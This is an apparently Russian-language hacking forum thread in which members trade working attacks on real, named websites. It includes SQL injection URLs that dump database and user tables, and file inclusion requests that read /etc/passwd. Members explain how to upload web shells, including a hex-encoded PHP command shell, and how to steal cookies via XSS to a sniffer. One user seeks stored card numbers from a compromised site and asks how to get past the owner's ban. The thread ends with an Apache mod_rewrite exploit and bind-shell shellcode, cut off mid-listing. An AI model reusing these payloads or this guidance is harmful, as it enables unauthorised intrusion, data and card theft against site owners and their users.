GaMeSTeR said:
Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта


спасибо друг

Каким образом обойти фильтрацию спец символов при xss ? мультибайт и кодирование не причем.

ReV0LVeR said:
Каким образом обойти фильтрацию спец символов при xss ? мультибайт и кодирование не причем.


Есть много способов обхода фильтрации XSS. Лучше скажите, какие символы фильтруются.

Попробуйте ввести следующее символы:


Code:
'';!--"=&{()}

и посмотрите в исходном коде HTML страницы, какие символы отфильтровались, а какие нет.

'';!--"<xss>=&{()}

ReV0LVeR said:
'';!--"<xss>=&{()}


Как Вы видите, практически все спец. символы фильтруются.

Увы, но обойти в Вашем случае фильтрацию нельзя.

народ, чёт не могу тут нечё сделать, подскажите

http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count %28*%29,concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29x+from+information_schem a.tables+group+by+x%29a%29--+

qaz said:
народ, чёт не могу тут нечё сделать, подскажите
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count %28*%29,concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29x+from+information_schem a.tables+group+by+x%29a%29--+




Code:
http://www.azyb.net/cgi-bin/jurn/main.cgi?id=87/**/and(select+1/**/from(select+count(*),concat((select+table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+g

Access denied for user 'azyb'@'127.0.0.27' to database 'information_schema'.

Брути таблицы...

блин, плохо, а тут постоянно переадресация чтобы не ввёл

http://www.33hochu.ru/fanclub.php?id=956%27

как с ней справится?

qaz said:
блин, плохо, а тут постоянно переадресация чтобы не ввёл
http://www.33hochu.ru/fanclub.php?id=956%27
как с ней справится?



Взгляни лучше сюда:

http://www.33hochu.ru/view_foto.php?id=82426'+union+select+version(),dat abase()+--+

Смотреть исходный код страницы. Дальше разберешься?

user()=33h

database()=33h@10.10.10.21

version()=5.5.22-1~dotdeb.0-log

Если я не ошибаюсь, то там blind.

kise said:
Если я не ошибаюсь, то там blind.


Ошибаешься.


Code:
http://www.33hochu.ru/view_foto.php?id=33382426'+union+select+table_name ,user()+from+information_schema.tables+limit+135,1 +--+

И смотришь исходный страницы код между "id_p=" и "&param".

Там очень много таблиц, среди которых заинтересует


Code:
user = (id,login,login_email,site,nick,password,password_ token,status,email,path,name,sex,data_b,url,icq,im ,data_reg,data_last,camera,optica,limit_id,foto_in _profile,foto_my,priv_mes,email_reg,rating,avatara ,ip,ip_reg,activiti,login_translit
id_style,email_pre,email_code_activ,napominalka,ko lvomp3,inbox_new,last_notify,counter,cfg_invisible ,cfg_autoplaymp3,cfg_hidestatus,cfg_hidevisits,cfg _rndmp3)

Скажите пожалуйста, вот я новичек в этом деле. Вообщем нашол уязвимый сайт, (сюда написать не могу) Вбиваю его в Хавидж, он видит всё, DBs, Tables, Columns, но в одном из пкнктов в Data вместо цифр идут кракозябры, как можно посмотреть эти цифры? Или можно как нибуть выкачать базу?

воспользуйся лучше sqlmap'ом тогда

ASPIRIN90 said:
Скажите пожалуйста, вот я новичек в этом деле. Вообщем нашол уязвимый сайт, (сюда написать не могу) Вбиваю его в Хавидж, он видит всё, DBs, Tables, Columns, но в одном из пкнктов в Data вместо цифр идут кракозябры, как можно посмотреть эти цифры? Или можно как нибуть выкачать базу?


Скрин прикрепи к сообщению, я хавидж практически не юзаю но ка кто попался мне криво крякнутый и там похожая проблема была..

Faaax said:
воспользуйся лучше sqlmap'ом тогда


Скачал но не знаю как запустить, Exeшника нет, он видимо на питоне, а я с ним еще никогда не работал((( кстати мне удалось зайти на сайт от имени админа, изменил логин и пароль админа. Так что сайт ПОКА под моим кантролем. Но вот как выкачать базу или посмотреть этот параметр я хз. Не знаю можно ли тут это обсуждать но мне надо посмотреть параметр Base-order-cardnum))) именно эти параметры отображаються кракозябрами)))

именно эти параметры отображаються кракозябрами)))


Вполне вероятно что шифрованы...

залей шелл через админку и подключись к базе

Я не знаю ничего про заливку шелла, новичек я еще, может подскажите как это организовть? Скажу точно что сайт стоит на CMS php-nuke, версия ХЗ

хотя и это я определил лиш по структуре ссылок

https://www.site.com/admin.php?op=config

https://www.site.com/admin.php?op=users

https://www.site.com/safe.php?op=pos_order

Можно ли как-то залить шелл?

http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ

kise said:
Можно ли как-то залить шелл?
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ


Правильнее будет вот так:


Code:
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00

Увы, но скорее всего Вам не удастся залить шелл.


ASPIRIN90 said:
Я не знаю ничего про заливку шелла, новичек я еще, может подскажите как это организовть? Скажу точно что сайт стоит на CMS php-nuke, версия ХЗ
хотя и это я определил лиш по структуре ссылок
https://www.site.com/admin.php?op=config
https://www.site.com/admin.php?op=users
https://www.site.com/safe.php?op=pos_order


Попробуйте определить версию форума, далее ищите эксплоиты. Особенно уязвима версия 7.8, удачного поиска.

UPD: Если Вы нашли sql inj, то попробуйте узнать логин и пароль администратора, желательно руками.

Пару ссылок:

23.3.2. SQL injection with PHP-Nuke (http://www.karakas-online.de/EN-Book/sql-injection-with-php-nuke.html)

SQL inj PHP-Nuke: Module EasyContent (http://www.xakep.ru/post/42427/default.asp)

[URL="http://securityreason.com/securityalert/440"]SQL Inj PHPNuke x

kise said:
Можно ли как-то залить шелл?
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ


У вас в конце нулл-байт отвалился. Что касается шелла, то, по идее, права у вас есть. Но я бы попробовал залить вот сюда


PHP:
http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/fd/2%00

(лог ошибок).

Как это сделать? Путем формирования User-Agent'а, примерно такого вида:


PHP:

Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.

И кстати, как можно обойти эту расчлененку? Режутся слеши и нулевой байт.

http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&Itemid=30&controller=../../../../../../../../../etc/passwd

kise said:
Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.
И кстати, как можно обойти эту
расчлененку
? Режутся слеши и нулевой байт.
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&Itemid=30&controller=../../../../../../../../../etc/passwd


Я бы с удовольствием объяснил, но из меня никудышный педагог Я могу накидать вам список статей по локальному PHP инклуду в личку, если понадобится, но вообще это все легко гуглится по запросу "/proc/self/environ инклуд", и уже на первой странице выдачи вы найдете всю информацию.

Удачи.

kise said:
Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.
И кстати, как можно обойти эту
расчлененку
? Режутся слеши и нулевой байт.
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&Itemid=30&controller=../../../../../../../../../etc/passwd



После /proc это не логи и ничего похожего на них. В ряде unix систем /proc - это виртуальная файловая система представляющая собой интерфейс для динамической работы с ядром.

А как обойти это расчленение?

http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&Itemid=30&controller=../../../../../../../../../etc/passwd

kise said:
А как обойти это расчленение?
http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&Itemid=30&controller=../../../../../../../../../etc/passwd



Попробуйте поискать уязвимости в других скриптах этого сайта. Может статься так, что какой-либо фильтр не дает произвести требуемую операцию. Так-же можно попробовать переопределение переменных в случае register_globals On. Но так как там хостинг, то последний вариант маловероятен.

Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.

Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...

http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../proc/self/environ%00

http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../proc/self/environ%000

kise said:
Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.
Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../proc/self/environ%00
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../proc/self/environ%000


Вы углубляетесь в детали После успешно проведенной атаки и заливки шелла(я нисколько не сомневаюсь, чтобы потом уведомить админов уязвимого ресурса о бреши в их защите ), многие вопросы отпадут сами собой - практика лучше всего. Что касается вашего вопроса про %00 - просто примите это как данность. Нулл-байт(ядовитый нуль, 0x00) пришел из мира C/C++ и означает конец строки.

kise said:
Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.
Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../proc/self/environ%00
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../proc/self/environ%000



Да действительно. Фильтр очень ограниченный и явно самопальный работает. Не происходит подстановка в варианте с %000 потому что фильтр не воспринимает как null-byte.

Вообще ,в данном случае ,редкая криворукость программиста играет нам на руку. Так как %000 обрабатывается php как %00 и усечение все-же происходит. Ошибку выдает потому, что нет прав на виртуальную файловую систему.

Но запрос вида http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../etc/passwd%000 успешно отображает passwd.

Cennarios said:
Да действительно. Фильтр очень ограниченный и явно самопальный работает. Не происходит подстановка в варианте с %000 потому что фильтр не воспринимает как null-byte.
Вообще ,в данном случае ,редкая криворукость программиста играет нам на руку. Так как %000 обрабатывается php как %00 и усечение все-же происходит. Ошибку выдает потому, что нет прав на виртуальную файловую систему.
Но запрос вида http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Itemid=32&controller=../../../../../../../../../etc/passwd%000 успешно отображает passwd.


Причем тут фильтр?

Там банально идет trim(), который убирает нульбайт, если он идет в конце строки, поэтому правильнее всегда после нульбайта подставлять символ какой-нибудь.

Фильтры, ага. =\

Tigger said:
Причем тут фильтр?
Там банально идет trim(), который убирает нульбайт, если он идет в конце строки, поэтому правильнее всегда после нульбайта подставлять символ какой-нибудь.
Фильтры, ага. =\



А использование trim внутри php кода не является образно говоря фильтром? Термин фильтр понятие обобщающее , описывающе достаточно большой перечень методов и реализаций. Если я делаю trim() - я фильтрую(убираю) то что мне надо, те использую фильтр. К тому же не факт ,что там только или именно trim. Поэтому упрекать меня в неточности в данном случае неправильно. Или имеется иная аргументация?

I am not getting something here.


Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+

Nothing works, maybe there is no cheekbones.

lightangel said:
I am not getting something here.

Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+

Nothing works, maybe there is no cheekbones.




Code:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1')+and(select+1+from(select+c ount(*),concat((select+table_name+from+information _schema.tables+limit+1,1),floor(rand(0)*2))x+from+ information_schema.tables+group+by+x)a)--+j



Code:
Error 1062: Duplicate entry 'COLLATIONS1' for key 1

http://lineoutdoor.ru/portfolio/list/type/-2'

Определил имя базы b50893

блинд. подобрал таблицу portfolio так:

http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s

Перебирая номер буквы A и аски код X

Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?

Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?

Кстати, путь имеет такой вид:

/www/apache/domains

Тут можно где-то найти логи?

kise said:
Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?


читать статьи =\

возможно прав не хватает, возможно это не Linux,а что то из семейства bsd, и еще куча чего

дальше буду стереть подобные посты

vlad-i-mir, а там случаем не error based?

vlad-i-mir said:
http://lineoutdoor.ru/portfolio/list/type/-2'
Определил имя базы b50893
блинд. подобрал таблицу portfolio так:
http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s
Перебирая номер буквы A и аски код X
Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?



Error-based :

http://lineoutdoor.ru/portfolio/list/type/1112'+or+1+group+by+concat(%20(select+column_name+ from+information_schema.columns+where+table_name+l ike+'Portfolio'+limit+0,1),floor(rand(0)*2))%20hav ing%20min(0)--+

Вопрос мой конечно не по уязвимостям, но писать больше некуда.

Значится, поимел я сайт, радмин, дедик, шелл - все как полагается.

Злой админ конешн со мной изрядно боролся, но ничего у него не выходило(ламер редкостный ) Вы спросите почему я не захватил полностью дедик и не удалил всех к чертям? Да просто мне это не нужно совсем, пусть живут. Я так думал, пока я сегодня получил от хрома отказ зайти на сайт. Захожу на дедик - также. Чекаю через прокси - все работает. Ясен пень что меня забанили, да еще как искусно! По подсети!

Работать под своим реальным ip не очень то и хочется(носки использую). Носки добывать новые тоже не очень вариант. Подскажите как мне быстренько восстановить доступ. От чего это зависит от сервера или от конфига на сайте? Если на сервере то что и где там прописано, чтобы я не заходил? Сервер Windows NT, через прокси могу заходить на шелл, ну и сразу на комп соответсвенно.

На сайтe через .htaccess. А насчет деда, думаю маршуритизатор..

А можно ли каким нибуь образом,узнать chmod на дирректорию?

Facecontrol said:
А можно ли каким нибуь образом,узнать chmod на дирректорию?




PHP:
ls-la

покажет не только листнг директории, но сhmod файлов и самой директории, из которой выполняется команда.


PHP:
ls-lF|grep/ |sed's/\///g'

Можно узнать текущие каталоги в этом каталоге и снова посмотреть на них chmod'ы.

Facecontrol said:
А можно ли каким нибуь образом,узнать chmod на дирректорию?



Выражаться - 'узнать chmod на директорию' не верно. chmod - это команда(программа) операционной ,nix подобной системы, с помощью которой производятся операции по изменению прав доступа к файловой системе. Правильнее говорить - Можно ли узнать какие права назначены директории etc

нужна помосчь в раскрутке,что то не получилось у меня(


Code:
http://www.dekret.ru/planirovanie/9m_4'.html

Faaax said:
нужна помосчь в раскрутке,что то не получилось у меня(

Code:
http://www.dekret.ru/planirovanie/9m_4'.html





Code:
http://www.dekret.ru/planirovanie/9m_4'+and(select+1+from(select+count(*),concat((se lect+table_name+from+information_schema.tables+lim it+1,1),floor(rand(0)*2))x+from+information_schema .tables+group+by+x)a)--+f.html

Problem?

думал что не получается,оказывается из-за невнимательности,забыл 2 скобки поставить)

А может быть такое, что например доступа в mysql для чтения привелегий нету, а файл прив есть?

qaz said:
А может быть такое, что например доступа в mysql для чтения привелегий нету, а файл прив есть?


Может быть. Если File_priv есть, считай сервер криво настроен, поэтому, как правило, есть доступ к базе mysql.

Почему это криво? Например в скрипте вполне может находится функция, которая посылает запрос к базе для выгрузки в файл каких-то данных, для этого и включают file_priv.

И вообще не вижу взаимосвязь активной file_priv и доступа к базе mysql

Добрый день. Точнее не очень добрый, поскольку у меня проблема, которую не удается победить, такого характера.

File_Priv = Y, но включены магические кавычки, поэтому into file залиться не смог. Раскрыл путь. На машине стоит XAMPP, и все пути там, cудя по всему, дефолтные после установки. Естественно, могу читать файлы.

Удалось получить доступ к админке. Вроде бы в одном из меню пропустилось расширение php, но проблема в том, что никак не получается узнать физическое расположение шелла. Единственное, что есть доступ к нему по такой ссылке, ессно, код не интерпретируется, а просто предлагается скачать файл. Можно что-то придумать? Или я что-то упускаю из вида?


PHP:
http://www.site.com/download_file.php?id=541

по дефолту у xampp стоит phpmyadmin и для root не установлен пароль, попытай удачу

а вообще если есть читалка, в чем проблема, посмотреть сорец скрипта загрузчика и узнать как и куда он заливает файлы.

Описание:

Есть сайт,например, site.com в корневой веб-директории лежит fckeditor 2.6.0

в общем site.com/fckeditor/../../../../browser.html?Connector=/.../../../connector.php выдает XML ошибку, то 404, то 0. В общем порывшись в мануалах, т.к. я не могу редактировать конфиг, то дописал &ServerPath=/EXfile/. И в результате файлы стали заливаться, ошибка исчезла, и они стали в файл-манагере отображаться. НО! я ищу залитый файл - хост выдает ошибку 404 файл не найден (заливаю текстовые файлы левые). Они отображаются через файл манагер (и только они), а через веб - не доступны. Причем по идее в этой папке лежат доковские файлы залитые админом, доступные для скачивания. И права на запись есть вроде как.

Вопросы:

1. В общем как найти мной залитые? (путь раскрыл вызвав ошибку)

2. Почему отобрыжаются только залитые мной файлы, а остальные (если это одна и таже директория) нет?

3. Может что-нибудь посоветуете?

Спасибо за ответы.

Обход фильтрации

Есть запрос:


SELECT * FROM admin__users WHERE login=LOWER('
логин'
) AND MD5(CONCAT('
пароль
',`password_salt`)) = `password` LIMIT 1


Фильтруются:


/*
--
=
#


Как-то можно заставить вернуть тру?

Expl0ited said:
по дефолту у xampp стоит phpmyadmin и для root не установлен пароль, попытай удачу
а вообще если есть читалка, в чем проблема, посмотреть сорец скрипта загрузчика и узнать как и куда он заливает файлы.


Спасибо, за ответ. C phpmyadmin'ом оказался облом.

New XAMPP security concept:

Access to the requested object is only available from the local network.

This setting can be configured in the file "httpd-xampp.conf".

Насчет сорца скрипта загрузчика. Вот, собственно, код.


PHP:


В общем, я может уже что-то сильно не понимаю(бьюсь над сайтом с ночи), но, эээ... мой шелл, который я залил через админку, оказался целиком записан в mysql, и, cудя по сорцам - просто аттачится. Более, того, абсолютно все php-cкрипты, которые составляют "костяк сайта", записаны в БД. То есть таким запросом:


PHP:
.php?id=-1+union+select+0x2e2e2f2e2e2f6c6f6c253030

я смог проинклудить index.php, лол. Но, к сожалению, как проинклудить шелл или выполнить его из mysql, я не знаю Кто-нибудь сталкивался с подобным?

как найти путь к файлу после заливки через fckeditor, если перебор не эффективен? (и через сайт не найти)

Га-Ноцри said:

PHP:
.php?id=-1+union+select+0x2e2e2f2e2e2f6c6f6c253030

я смог проинклудить index.php, лол. Но, к сожалению, как проинклудить шелл или выполнить его из mysql, я не знаю
Кто-нибудь сталкивался с подобным?


Эмм, а что мешает проинклудить свой шелл? Прямо из бд?

Pirotexnik said:
Эмм, а что мешает проинклудить свой шелл? Прямо из бд?


Пробовал, не получается. Шелл записывается в другую таблицу, не где скрипты сайта, и из которой у меня не получилось его подцепить. Если есть свободное время и интерес, отпиши в ПМ, скину ссылку - мне не жалко Может у тебя что-то получится.

Подскажите способы заливки шелла через админку

Facecontrol said:
Подскажите способы заливки шелла через админку


http://www.google.ru/#hl=ru&newwindow=1&output=search&sclient=psy-ab&q=%D0%B7%D0%B0%D0%BB%D0%B8%D0%B2%D0%BA%D0%B8+%D1%8 8%D0%B5%D0%BB%D0%BB%D0%B0+%D1%87%D0%B5%D1%80%D0%B5 %D0%B7+%D0%B0%D0%B4%D0%BC%D0%B8%D0%BD%D0%BA%D1%83&oq=%D0%B7%D0%B0%D0%BB%D0%B8%D0%B2%D0%BA%D0%B8+%D1% 88%D0%B5%D0%BB%D0%BB%D0%B0+%D1%87%D0%B5%D1%80%D0%B 5%D0%B7+%D0%B0%D0%B4%D0%BC%D0%B8%D0%BD%D0%BA%D1%83&aq=f&aqi=&aql=&gs_l=hp.3...1041l1041l1l1975l1l1l0l0l0l0l583l583l5-1l1l0.frgbld.&psj=1&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&fp=4d05dc9d3da3250f&biw=1366&bih=664

И ещё вопрос,что означает если при запросе на вывод данных из таблицы mysql выводится ошибка?

Facecontrol said:
И ещё вопрос,что означает если при запросе на вывод данных из таблицы mysql выводится ошибка?


это означает что произошла ошибка

Сообщение от Facecontrol
И ещё вопрос,что означает если при запросе на вывод данных из таблицы mysql выводится ошибка?


прав не хватает

А обойти это как нибудь можно?

Есть скрипт asp, выводящий новости, в котором подозреваю SQLi

Ситуация следующая:

когда передаю в id новости кавычку/двойную кавычку или 1'+--+ или 1'+;+ и т.д. он не выводит ничего... Но есть 1 вариант, вывод которого отличается от всех: 1'-- (то есть без пробела после кавычки) в этом случае выплевывает "The server (www.x.com) encountered an error attempting to respond to your request."

Почему при этом варианте вывод отличается и какой может быть вид sql-запроса?

Подумал что фильтруют пробелы изменил запрос на 1'/**/--/**/ получил вывод с ошибкой как при 1'-- и при 1'/**/or/**/1=1/* аналогично. Еще пробовал подбирать закрывающие скобки, ничего не менялось. Все эти случаи как с 1'--

Добрый день, сть хсс вида:

[QUOTE="None"]
site.com/index.php?id="/>

Pirotexnik said:
Добрый день, сть хсс вида:
Как сначала отправить на ядовитую ссылку (либо просто слить куки), а потом вернуть юзера на нужную страницу?
Проблемма в том, что для кражи куков используется картинка, на которую и идет редирект. А с неё уже не выходит перенаправить(
Спасибо.


Сливаеш куки потом,


Code:
window.location = 'http://jghjhgk';

А как слить куки на сниффер без переадресации?

Подскажите, пожалуйста, что это за разновидность эдитора такая?

http://s019.radikal.ru/i624/1204/d4/2884b390fc9b.jpg

а то немного запутался. спасибо.

Pirotexnik said:
А как слить куки на сниффер без переадресации?


Через ифреем!

или через AJAX))

вопросов на подобии "почему молоко белое, а траву корова ест зеленую?", было предостаточно как и в этой теме, так и в комментариях к одноименным статьям, не ленимся, читаем!

p.s. кстати вопрос "почему молоко белое, а траву корова ест зеленую?", на мой взгляд гораздо интереснее, и не совсем понятно все таки почему.

p.p.s. теперь мне понятно:


Все дело в том, что появлением молока корова, как впрочем, и все млекопитающие, обязана внутренним физиологическим процессам, таким как лактация и синтез. Благодаря этим процессам вымя, прежде чем произвести молоко всасывает с крови все необходимые для этого вещества. Одним из таких веществ и является белок казеин, именно благодаря ему молоко становиться белого цвета, точнее тем мелким частицам (мицеллам), которые он образует. К слову сказать, именно казеин является основным составляющим молока, ведь процент его содержания в нем достигает 70-90%, что согласитесь немало.

Приветствую, при запросе ( search_result.php?search=1 ') выдаёт

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/piluli/deploy/releases/20120405144039/public/search_result.php on line 393

стоит ли ковырять дальше ?

нет.

Вопрос такого плана.

Эта вроде скуля, но не раскручивается никак. или я что то не понимаю. подскажите плиз с раскруткой.

http://bdsmpeople.ru/search/index.php?input_action=search&input_who1=&input_who2='&input_bdsm_position=&input_age1=&input_age2=&input_country_id=0&input_state_id=0&input_city_id=0

параметр input_who2

вот ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND (birthday BETWEEN '19120407' AND '19940407') AND (status='0')' at line 4

У меня маленький вопросец,

залил шел через скулю

открываю его, а мне пишет


Forbidden
You don't have permission to access /uploads/shell.php on this server.


хотел создать свой .htaccess с содержимым


AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg



но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?

qaz said:
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?


хз. если ток искать другую директорию для заливки шелла.

Pirotexnik said:
А как слить куки на сниффер без переадресации?


site.com/index.php?id=[COLOR="Green"]"> в начале XSS, закрывать обработчик onerror и тег img не нужно.

Для незаметной эксплуатации вставляешь ссылку в скрытый фрейм и размещаешь его на своем сайте:

Внутри фрейма в атрибуте src не забывай заменять двойные кавычки на html-сущности (", " или "). Также внутри src не используй urlencode, как в прямой ссылке, пробелы остаются пробелами, плюсы - плюсами.


eclipse said:
или через AJAX))


Домен сниффера отличается от домена XSS

Пытаюсь залить шелл через mysql(f_p =Y).

Мой запрос выглядит так:


1'+union+select+1,2,3,4,5,union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23+--+


Вылетает такая ошибка.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',' at line 1


(Шелл на сайт уже заливал кто-то, сапа стоит)

попробуй этот код за хексить

получится 0x3c3f2073797374656d28245f524551554553545b27636d64 275d293b203f3e

Для примера я хотел записать в файл user(), что из этого вышло можешь почитать немного выше...

Разобрался.


1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23%20and%28select%2 0%225656%22%20INTO%20OUTFILE%20%22/www/domens/dir1/www/banner/mysql.php%22%29+--+


Так выводит 13 ошибку, а это - ошибка записи.

kise said:
Пытаюсь залить шелл через mysql(f_p =Y).


Зачем union select дважды то?


1'+union+select+1,2,3,4,5,'',7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23+into+outfile+'/www/domens/dir1/www/banner/mysql.php'--+f

Всем привет. Я нашел багу на сайте Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability, скомпилировал эксплойт, запускаю, но не удается подключиться к шелу:


Code:
./exploit ipсайта test
Exploit: apache mod rewrite exploit (win32)
By: fabio/b0x (oc-192, old CoTS member)
Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[-]Unable to connect

Код эксплойта:


Code:
/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 80
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x 41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x 49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x 56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x 6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x 4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x 72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x 6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x 37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x 6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x 74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x 5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x 58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x 6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x 64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x 6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x 4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x 31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x 43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x 70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x 74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x 64\x35\x4a\x52"
